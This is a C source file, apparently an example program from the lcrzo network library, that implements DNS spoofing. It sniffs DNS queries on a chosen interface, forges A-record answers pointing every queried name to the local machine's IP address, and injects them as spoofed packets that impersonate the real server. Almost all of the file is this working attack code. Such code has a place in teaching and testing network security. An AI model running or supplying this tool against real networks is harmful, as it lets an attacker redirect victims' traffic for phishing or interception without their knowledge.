
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
shared_lcrzoex_infos lcrzoex_000368=
{ /*reference*/     "lcrzoex", 368,
  /*version*/       1, 0,
  /*title*/         "sniff DNS and send answers indicating our computer",
  /*french title*/  "sniffe le DNS et envoie des reponses indiquant notre machine",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "[device [\"bpf_filter\"]]",
  /*french usage*/  "[device [\"filtre_bpf\"]]",
  /*usage example*/ "eth0 \"host 1.2.3.4\"",
  /*fr. usage ex.*/ "eth0 \"host 1.2.3.4\"", 
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000368_main(int argc, char *argv[]);
int lcrzoex_000368_dns_answer(lcrzo_constdata sniffdata,
			      lcrzo_int32 sniffdatasize,
			      lcrzo_constdevice device,
			      lcrzo_ipl ouripl);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000368_main(int argc, char *argv[])
{ lcrzo_device device;
  lcrzo_uint32 mtu;
  lcrzo_sniff sniff;
  lcrzo_data sniffdata;
  lcrzo_int32 sniffdatasize;
  lcrzo_ipl ouripl;
  int ret;
  
  lcrzo_init();

  /* init device and mtu */
  if (argc>=2)
  { lcrzo_epr(shared_para_device_init_src(argv[1], device));
  }
  else
  { lcrzo_epr(lcrzo_device_value_pos(LCRZO_DEVICE_TYPE_BEST, 1, device));
  }
  lcrzo_epr(lcrzo_mtu_init_device(device, &mtu));
  lcrzo_epr(lcrzo_ipl_init_device(device, &ouripl, NULL));

  /* init sniff */
  if (argc<=2)
  { lcrzo_epr(lcrzo_sniff_init(device, mtu, LCRZO_SNIFF_TYPE_TCPREOR, 
                               "udp and dst port 53", &sniff));
  }
  else
  { lcrzo_string snifffilter;
    lcrzo_epr(shared_para_string_init_snifffilter(argv[2], &snifffilter));
    lcrzo_epr(lcrzo_sniff_init(device, mtu, LCRZO_SNIFF_TYPE_TCPREOR, 
                               snifffilter, &sniff));
    lcrzo_er(lcrzo_string_free2(&snifffilter));
  }

  /* main loop */
  ret=LCRZO_ERR_OK; /* just for the compiler warning */
  while(LCRZO_TRUE)
  { ret=lcrzo_sniff_nextm(&sniff, LCRZO_WAIT_INFINITE, 
                          &sniffdata, &sniffdatasize);
    if (ret!=LCRZO_ERR_OK) break;
    lcrzo_epr(lcrzoex_000368_dns_answer(sniffdata, sniffdatasize,
					device, ouripl));
    lcrzo_er(lcrzo_data_free2(&sniffdata));
  }

  /* close everything */
  lcrzo_epr(lcrzo_sniff_close(&sniff));
  if (ret!=LCRZO_ERR_OK) { lcrzo_epr(lcrzo_err_print(ret)); }

  lcrzo_close();
  return (ret);
}

/*-------------------------------------------------------------*/
int lcrzoex_000368_dns_answer(lcrzo_constdata sniffdata,
			      lcrzo_int32 sniffdatasize,
			      lcrzo_constdevice device,
			      lcrzo_ipl ouripl)
{ shared_dns_header dnsheader;
  lcrzo_data response, udpdata;
  lcrzo_list rrlist;
  lcrzo_int32 responsesize;
  shared_dns_rr rrquestion, rr;
  lcrzo_uint32 ttl;
  lcrzo_uint16 udpdatasize, porttmp;
  lcrzo_hdrleth hdrleth;
  lcrzo_hdrlip hdrlip;
  lcrzo_hdrludp hdrludp;
  lcrzo_etha ethatmp;
  lcrzo_ipl ipltmp;
  lcrzo_spoof spoof;
  int ret;

  ret=lcrzo_packet_decodem_ethipoptudpdata(sniffdata, sniffdatasize,
					   &hdrleth, &hdrlip, NULL, NULL,
					   &hdrludp, 
					   &udpdata, &udpdatasize);
  if (ret!=LCRZO_ERR_OK) return(LCRZO_ERR_OK);

  /* display received data */
  ret=shared_dns_print(udpdata, udpdatasize, LCRZO_PRINTTYPE_ARRAY);
  if (ret!=LCRZO_ERR_OK)
  { lcrzo_er(lcrzo_data_free2(&udpdata));
    return(LCRZO_ERR_OK);
  }

  /* preparate for the response */
  ret=shared_dns_packet_decode(udpdata, udpdatasize,
			       &dnsheader, &rrlist);
  lcrzo_er(lcrzo_data_free2(&udpdata));
  if (ret!=LCRZO_ERR_OK)
  { return(LCRZO_ERR_OK);
  }

  /* only answer to questions */
  if (dnsheader.isaresponse)
  { lcrzo_er(lcrzo_list_close(&rrlist));
    return(LCRZO_ERR_OK);
  }
  if ( dnsheader.count_question!=1 && 
       dnsheader.count_answer!=0 && 
       dnsheader.count_authority!=0 && 
       dnsheader.count_additional!=0 )
  { lcrzo_er(lcrzo_list_close(&rrlist));
    return(LCRZO_ERR_OK);
  }

  /* get the first (and only) RR */
  ret=shared_dns_rrlist_value_pos(&rrlist, +1, &rrquestion);
  if (ret!=LCRZO_ERR_OK)
  { lcrzo_er(lcrzo_list_close(&rrlist));
    return(LCRZO_ERR_OK);
  }

  /* ignore other classes */
  if ( rrquestion.rrclass!=SHARED_DNS_RR_CLASS_IN )
  { lcrzo_er(shared_dns_rr_close(&rrquestion));
    lcrzo_er(lcrzo_list_close(&rrlist));
    return(LCRZO_ERR_OK);
  }

  /* ignore other questions */
  if ( rrquestion.type!=SHARED_DNS_RR_TYPE_A )
  { lcrzo_er(shared_dns_rr_close(&rrquestion));
    lcrzo_er(lcrzo_list_close(&rrlist));
    return(LCRZO_ERR_OK);
  }

  /* prepare new header */
  dnsheader.isaresponse=LCRZO_TRUE;
  dnsheader.rcode=SHARED_DNS_HEADER_RCODE_OK;

  /* now add reponses in the list */
  ttl=60;
  lcrzo_er(shared_dns_rr_init_resp_a(rrquestion.name, ttl, ouripl,
				     SHARED_DNS_RR_KIND_ANSWER, &rr));
  lcrzo_er(shared_dns_rrlist_add_pos(&rrlist, -1, rr));
  lcrzo_er(shared_dns_rr_close(&rr));
  /* no authority
    lcrzo_er(shared_dns_rr_init_resp_ns(rrquestion.name, ttl, dnsservername,
                                        SHARED_DNS_RR_KIND_AUTHORITY, &rr));
    lcrzo_er(shared_dns_rrlist_add_pos(&rrlist, -1, rr));
    lcrzo_er(shared_dns_rr_close(&rr));
    lcrzo_er(shared_dns_rr_init_resp_a(dnsservername, ttl, dnsserverip,
                                       SHARED_DNS_RR_KIND_ADDITIONAL, &rr));
    lcrzo_er(shared_dns_rrlist_add_pos(&rrlist, -1, rr));
    lcrzo_er(shared_dns_rr_close(&rr));
  */
 
  /* do not need it anymore */
  lcrzo_er(shared_dns_rr_close(&rrquestion));

  /* construct the packet */
  ret=shared_dns_packet_initm(dnsheader, &rrlist, &response, &responsesize);
  lcrzo_er(lcrzo_list_close(&rrlist));
  if (ret!=LCRZO_ERR_OK) return(ret);
  lcrzo_er(shared_dns_print(response, responsesize, LCRZO_PRINTTYPE_ARRAY));

  /* response (invert headers and spoof) */
  lcrzo_epr(lcrzo_etha_init_etha(hdrleth.src, ethatmp));
  lcrzo_epr(lcrzo_etha_init_etha(hdrleth.dst, hdrleth.src));
  lcrzo_epr(lcrzo_etha_init_etha(ethatmp, hdrleth.dst));
  ipltmp=hdrlip.saddr;
  hdrlip.saddr=hdrlip.daddr;
  hdrlip.daddr=ipltmp;
  hdrlip.totlen=LCRZO_HDRLIP_TOTLEN_DEFVAL; /* ignore ip options */
  hdrlip.ihl=LCRZO_HDRLIP_IHL_DEFVAL; /* ignore ip options */
  hdrlip.check=LCRZO_HDRLIP_CHECK_DEFVAL;
  porttmp=hdrludp.sport;
  hdrludp.sport=hdrludp.dport;
  hdrludp.dport=porttmp;
  hdrludp.len=LCRZO_HDRLUDP_LEN_DEFVAL;
  hdrludp.check=LCRZO_HDRLUDP_CHECK_DEFVAL;
  /* spoof */
  lcrzo_epr(lcrzo_spoof_init(&spoof));
  lcrzo_epr(lcrzo_spoof_set_printbeforesending(&spoof, LCRZO_FALSE));
  lcrzo_er(lcrzo_spoof_ethipoptudpdata(&spoof, device, 
				       hdrleth, hdrlip, NULL, 0,
				       hdrludp, response, (lcrzo_uint16)responsesize));
  lcrzo_epr(lcrzo_spoof_close(&spoof));

  lcrzo_er(lcrzo_data_free2(&response));

  return(LCRZO_ERR_OK);
}
